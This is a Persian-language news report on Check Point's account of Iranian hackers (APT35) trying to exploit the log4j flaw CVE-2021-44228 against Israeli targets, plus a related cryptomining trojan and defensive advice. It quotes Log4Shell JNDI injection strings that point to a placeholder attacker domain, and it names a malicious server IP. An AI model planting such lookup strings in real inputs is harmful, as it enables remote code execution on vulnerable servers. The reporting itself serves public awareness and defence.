شکست هکرهای ایرانی برای هک اهداف اسرائیلی

احمد باطبی

شرکت امنیت سایبری «چک‌​پوینت» (CheckPoint) اعلام کرده که روز چهارشنبه پانزدهم دسامبر ۲۰۲۱ حمله سایبری هکرهای وابسته به جمهوری اسلامی را به هفت هدف در اسرائیل ناکام گذاشته است.  

این شرکت اسرائیلی-امریکایی گفته گروه هکری موسوم به «بچه گربه ملوس» (Charming Kitten)، از زیرمجموعه​‌های «تهدید پیشرفته مدام ۳۵» (APT 35) تلاش کرده ​‌است با استفاده از ضعف امنیتی موجود در نرم‌​افزار «لاگ۴جی» (log4j)، به شبکه داخلی هفت سازمان تجاری و دولتی اسرائیل نفوذ کنند.  

این حمله​‌ها در بازه زمانی شش صبح تا چهار بعد از ظهر به وقت محلی انجام شده بود که نشان می‌دهد فعالیت مهاجمان در چارچوب  ساعت‌های اداری انجام شده است.

APT»، (Advanced Persistent Threat)» اصطلاحی است برای اشاره به تهدیدهای مستمر و سازمان‌​یافته​‌ای که از سوی هکرهای تحت حمایت دولت​‌ها سازمان‌دهی و اجرا می‌شود.

هدف این تهدید​ها معمولا دولت​‌های دشمن و یا رقیب، مخالفان حکومت، سازمان‌​ها و نهاد​های تاثیرگذار، شرکت​‌ٔهای تجاری و مراکز علمی هستند. گروه‌​های تهدید پیشرفته مدام با علامت اختصاری APT و ارقام منتسب به آن شناخته می‌شوند؛ به عنوان مثال، گروه​‌های APT33 ،APT34 ،APT39  از جمله گروه ایرانی تهدید پیشرفته مدام ایرانی هستند که تحت حمایت جمهوری اسلامی به فعالیت‌​های مجرمانه اینترنتی مشغولند.

به گفته «چک‌​پوینت»، گروه هکری بچه گربه​ ملوس از جمله گروه‌​های وابسته به سپاه پاسداران انقلاب اسلامی است که در سال‌​های اخیر حمله​‌های سایبری فراوانی را علیه روزنامه​‌نگاران، کنش‌گران و سازمان​‌های مردم‌​نهاد انجام داده است و حمله به اهدافی در اسرائیلی نیز در کارنامه آن‌ها به چشم می‌​خورد. 

نرم‌​افزار لاگ۴جی (log4j) یکی از محبوب‌​ترین کتاب‌خانه​‌های «لاگ جاوا» است که تاکنون بیش از ۴۰۰ هزار بار از منبع ناشر آن در مخزن «گیت‌​هاب» (GitHub) دانلود شده است و بسیاری از شرکت‌​ها در سراسر جهان از آن استفاده می‌​کنند. بنا بر آمار، از سال ۲۰۱۵ تا کنون بیش از ۱۳ میلیارد دستگاه در سراسر جهان از جاوا استفاده کرده‌اند که این خود وسعت بالقوه سوء استفاده از این آسیب‌پذیری را نشان می‌​دهد.  

آسیب‌پذیری یافته شده در این نرم​‌افزار، ۹ دسامبر سال جاری میلادی کشف و تحت عنوان «CVE-2021-44228» گزارش شده بود. این آسیب ​پذیری که از نوع حاد محسوب می‌شود، در بسته «لاگ آپاچی۲» (Log4j 2)، نسخه​ «2.14.1» و قبل از آن وجود داشته است و امکان اجرای کد​های مخرب از راه دور (Remote Code Execution) را برای هکرها فراهم می‌​کند. 

کتاب‌خانه لاگ۴جی تقریباً در هر برنامه و سرویس اینترنتی شناخته شده وجود دارد؛ از جمله توییتر، آمازون، مایکروسافت و غیره. هکرها در صورت موفقیت در بهره​‌برداری از این آسیب‌پذیری، می‌توانند کنترل سرورهای مبتنی بر جاوا را در اختیار خود گرفته و از آن برای اهداف مختلف استفاده کنند.

مهاجمان با شیوه‌​های مختلف، ازجمله جست‌وجوی عبارت «logging for Java» در موتور جست‌وجوگر گوگل و یا با ابزارهای «اسکن»، اهداف آسیب‌​پذیر را یافته و با استفاده از «Log4Shell» و ویژگی «JNDI» موجود در یک برنامه جاوا مرتبط با ماژول آسیب‌​پذیر Log4j 2، رشته​‌ای مانند «${ jndi:ldap://path/to/code}» را بسته به نوع «TCP» مورد استفاده دستگاه هدف، به عنوان بخشی از یک نام کاربری، رمز عبور، شماره تلفن و یا موارد دیگر را به دستگاه هدف ارسال کرده و کنترل آن را به دست می​‌گیرند. 

ویژگی «JNDI» به اشیای جاوا اجازه می‌دهد که در بستر زمان، توسط یک برنامه​ جاوا بارگذاری شود و مورد استفاده قرار گیرد. پروتکل​ مورد استفاده این ویژگی نیز «DAP» نام دارد که از جمله پروتکل​‌های متن باز محسوب و برای دسترسی به اطلاعات دایرکتوری استفاده می‌​شود. مهاجم در واقع با ارسال رشته‌​ای مانند «${ jndi:ldap://[attacker_domain]/file}»، به برنامه دستور می‌​دهد که کلاس «[attacker_domain]/file» را از طریق ویژگی JNDI فراخوانی کند و نتیجه آن را با استفاده از پروتکل​ DAP به او ارایه دهد. 

در مدل خفیف‌تری از «اکسپلویت» CVE-2021-44228، مهاجم با ارسال یک درخواست «DNS»، دست‌کاری شده از سرور تحت اختیار خود، اطلاعات محرمانه دستگاه هدف را استخراج می‌​کند. 

جاوا نسخه ۸ و بالاتر محدودیت​‌هایی را برای رشته​‌هایی مانند «${jndi:ldap://...}» ایجاد کرده است اما این محدودیت​‌ها توان ایستادگی در مقابل حمله​‌های پیچیده را ندارند. چرا که این نرم​‌افزار به زبان «اسکریپت» log4j2’s homebrew، موسوم به (lookups) نوشته شده است که در صورت قدری خلاقیت، می‌توان آن را برای دو زدن «IPS» و «WAF» توسعه داد. از سویی دیگر، ساختار این مجموعه ​کدها به شکلی است که نمی‌​توان حتی در صورت انتشار وصله​‌امنیتی نیز تمام مجموعه را وادار کرد که از ماژول وصله شده استفاده کنند. 

چک‌​پوینت هشدار داده است که سوء استفاده از این آسیب‌پذیری، مانند آتش سوزی گسترده در حال فراگیر شدن است و یکی از شایع‌ترین سوء استفادها از این ضعف امنیتی، «کریپتو ماینینگ» crypto mining یا به بردگی گرفتن سرورها و استفاده از توان آن‌ها برای استخراج رمزارز است. 

به گفته چک‌​پوینت، تا روز دوازدهم دسامبر، صنایع مالی، بانکی و نرم​‌افزاری دست‌​کم پنج کشور جهان شامل اسرائیل، ایالات متحده، کره جنوبی، سوئیس و قبرس درگیر کریپتو ماینینگ شده​‌اند.   

چک‌​پوینت می‌​گوید اگرچه تاکنون اکثر حمله​‌های کریپتو ماینینگ مبتنی بر سیستم‌​های عامل لینوکس بوده‌​ا‌ند اما در حملات اخیر، بارگذاری تروجانی مبتنی بر «دات​نت» به نام «Win32 sfrnp» با فرمت اجرایی (exe)، کشف شده است که طی فرایند «StealthLoader»، سیستم​‌های عامل ویندوز را آلوده و بر روی آن‌ها یک «crypto-miner» نصب می​‌کند تا بدون اطلاع قربانی، از دستگاه او برای استخراج رمز​ارز استفاده کند. 

تروجان «Win32 sfrnp.exe» در ابتدا تلاش می‌​کند در محیطی ایزوله اجرا شود. در صورت عدم امکان ایجاد محیط ایزوله، این بدافزار در مسیر «C:\Windows\Temp» سیستم عامل ویندوز جای می‌گیرد و پوشه‌​ای جدید به نام «sfrpn»، به تاریخ هفتم ژانویه ۱۹۶۷ ایجاد می‌​کند تا با تعلیق در فرایند اجرا، بیش از پیش خود را از دیدها پنهان کند. 

این بدافزار پس از ایجاد پایداری در دستگاه قربانی، یک استخراج کننده اختصاصی سکه «XMRig» به همراه کیف پول شخصی روزارز لمونرو» نصب و از منابع سیستم قربانی برای جلوگیری از شناسایی خود استفاده می‌کند.‌

در تصویر زیر، نمونه‌ای از کد​های مخرب کشف شده نمایش داده می‌​شود که کار آن بارگیری نسخه​‌ای از «PowerShell script» از طریق پروتکل «HTTP» و نصب چندین نوع از بدافزارها از سروری با «ای پی» 2[.]56.59.123، مستقر در خاک امریکا است. 

شرکت چک‌​پوینت در ساعات ابتدایی انتشار گزارش این آسیب‌​پذیری در روز جمعه دهم سپتامبر، در کمتر از ۲۴ ساعت، حدود ۶۰ بهره‌​برداری از این آسیب‌​پذیری حاد را رصد و کشف کرده است. این حمله‌ها یک روز بعد یک‌باره به ۴۰ هزار مورد افزایش یافتند و روز بعد به ۲۰۰ هزار و روز بعد از آن به ۸۰۰ هزار حمله رسیدند. 

شرکت چک‌​پوینت برای تشریح سوء استفاده وسیع از آسیب‌​پذیری ویران‌​گر «CVE-2021-44228»، از عبارت «pandemic» به معنای همه‌گیری استفاده کرده است که در دو سال اخیر در خصوص عالم‌​گیری ویروس کرونا استفاده شد. 

تا لحظه تنظیم این گزارش، ۹۰ کشور درگیر حمله​‌های هکری مبتنی بر آسیب​پذیری Log4j 2 شده​‌اند. بنابر تخمین​‌ها، ۵۰ در صد از شبکه​‌های شرکتی درون مرزهای جغرافیایی کشورهای درگیر و ۴۴ درصد از شبکه​‌های شرکتی سراسر جهان تحت تاثیر این حمله‌​ها هستند. 

شرکت چک‌​پوینت برای ممانعت از گرفتار شدن در درام این ضعف امنیتی، موارد زیر را لازم دانسته است: 

رصد و رمزگشایی: تجزیه و تحلیل بار ترافیک شبکه و دستگاه‌​های مرتبط، بررسی «HTTP headers»، استخراج «JSON/XML» و بررسی عادی بودن بار شبکه. 

بررسی نشانه​‌های حمله: استخراج محموله​‌های تبادل شده بین دستگاه و یا شبکه با فضای خارجی و جست‌وجو برای یافتن نشانه‌​هایی از آلودگی، مانند «Remote Code Execution» و یا «Command Injection».

استفاده از موتور ارزیابی متنی: شیوه​‌ا‌ی برای تعیین نهایی مخرب بودن محموله و امتیاز دهی به شاخص​‌ها.

چک‌​پوینت هم‌چنین استفاده از موتورهای جانبی دیگر مانند CloudGuard AppSec، API Protection، Web Anti-Bot، IPS، Schema Validation را برای بررسی مواردی هم‌چون تبادل اطلاعات در دروازه​‌های برنامه​‌های امضا​های الکترونیک و دیگر موارد را توصیه کرده است.